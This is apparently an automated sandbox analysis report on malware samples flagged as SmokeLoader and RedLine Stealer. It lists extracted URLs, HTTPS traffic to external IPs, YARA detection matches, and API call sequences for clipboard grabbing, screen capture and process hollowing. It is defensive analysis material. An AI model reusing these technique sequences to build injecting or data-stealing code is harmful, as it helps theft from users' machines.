                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                Source: 38F9.exe, 00000006.00000003.2069016777.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2657504596.000000001E223000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.11.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/QCvivEbfrAF.exe
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/al
                Source: DHDHCG.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                Source: 38F9.exe, 00000006.00000003.2069016777.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2657504596.000000001E223000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.11.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                Source: explorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                Source: explorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                Source: explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:49768 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 00000005.00000002.1969820013.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1740978999.00000000049F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3994237528.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1740710634.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3994385384.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1969780302.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_0042EAB0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_0042EAB0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,6_2_0042EC90
                Source: Yara matchFile source: 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: D818.exe PID: 7224, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 10.2.D818.exe.4570000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 10.2.D818.exe.2560000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 10.2.D818.exe.4347719.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 10.2.D818.exe.2560000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 10.2.D818.exe.4347719.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 10.2.D818.exe.4570000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 00000010.00000002.3994207435.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000005.00000002.1969684642.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.1740824715.0000000002E2B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.1969820013.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000005.00000002.1969542787.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.1740978999.00000000049F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000010.00000002.3994237528.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 00000000.00000002.1740688964.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 00000000.00000002.1740710634.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000010.00000002.3995067757.000000000302E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000010.00000002.3994385384.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.2346623744.00000000005DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.1969780302.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401615
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401658
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00403406 GetModuleHandleA,CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,0_2_00403406
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401620
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401524
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040162D
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401635
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401615
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401658
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401620
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401524
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040162D
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401635
                Source: C:\Users\user\AppData\Local\Temp\D818.exeCode function: 10_2_04379B10 NtProtectVirtualMemory,NtProtectVirtualMemory,10_2_04379B10
                Source: C:\Users\user\AppData\Local\Temp\D818.exeCode function: 10_2_0437A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,10_2_0437A4F0
                Source: C:\Users\user\AppData\Local\Temp\D818.exeCode function: 10_2_04379850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,10_2_04379850
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC262C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,11_2_6CC262C0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004273536_2_00427353
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004208806_2_00420880
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004049706_2_00404970
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0041FD106_2_0041FD10
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0043B0506_2_0043B050
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004261746_2_00426174
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004061F06_2_004061F0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004262846_2_00426284
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004223B86_2_004223B8
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004054406_2_00405440
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0040F4006_2_0040F400
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004164D26_2_004164D2
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004334806_2_00433480
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004035706_2_00403570
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004215806_2_00421580
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004016E06_2_004016E0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004067B06_2_004067B0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_004089A06_2_004089A0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00424B806_2_00424B80
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00421C716_2_00421C71
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00425CEE6_2_00425CEE
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00440D366_2_00440D36
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0043AD306_2_0043AD30
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00407DF06_2_00407DF0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00404EF06_2_00404EF0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00435EB06_2_00435EB0
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00403F806_2_00403F80
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005680576_2_00568057
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005820676_2_00582067
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005651576_2_00565157
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005961176_2_00596117
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005641E76_2_005641E7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005612676_2_00561267
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0059B2B76_2_0059B2B7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005863DB6_2_005863DB
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005664576_2_00566457
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005864EB6_2_005864EB
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005875BA6_2_005875BA
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0056F6676_2_0056F667
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005936E76_2_005936E7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005656A76_2_005656A7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005767396_2_00576739
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005637D76_2_005637D7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00580AE76_2_00580AE7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00564BD76_2_00564BD7
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00568C076_2_00568C07
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00585F556_2_00585F55
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0059AF976_2_0059AF97
                Source: C:\Users\user\AppData\Local\Temp\D818.exeCode function: 10_2_0437AB1010_2_0437AB10
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CA9ECC011_2_6CA9ECC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAFECD011_2_6CAFECD0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7AC3011_2_6CB7AC30
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB66C0011_2_6CB66C00
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAAAC6011_2_6CAAAC60
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC2CDC011_2_6CC2CDC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA4DB011_2_6CAA4DB0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB36D9011_2_6CB36D90
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB6ED7011_2_6CB6ED70
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CC28D2011_2_6CC28D20
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBCAD5011_2_6CBCAD50
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB26E9011_2_6CB26E90
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAAAEC011_2_6CAAAEC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB40EC011_2_6CB40EC0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB80E2011_2_6CB80E20
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB3EE7011_2_6CB3EE70
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBE8FB011_2_6CBE8FB0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAAEFB011_2_6CAAEFB0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7EFF011_2_6CB7EFF0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA0FE011_2_6CAA0FE0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBE0F2011_2_6CBE0F20
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAA6F1011_2_6CAA6F10
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB62F7011_2_6CB62F70
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB0EF4011_2_6CB0EF40
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBA68E011_2_6CBA68E0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CAF082011_2_6CAF0820
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB2A82011_2_6CB2A820
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB7484011_2_6CB74840
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB609B011_2_6CB609B0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB309A011_2_6CB309A0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB5A9A011_2_6CB5A9A0
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CBBC9E011_2_6CBBC9E0
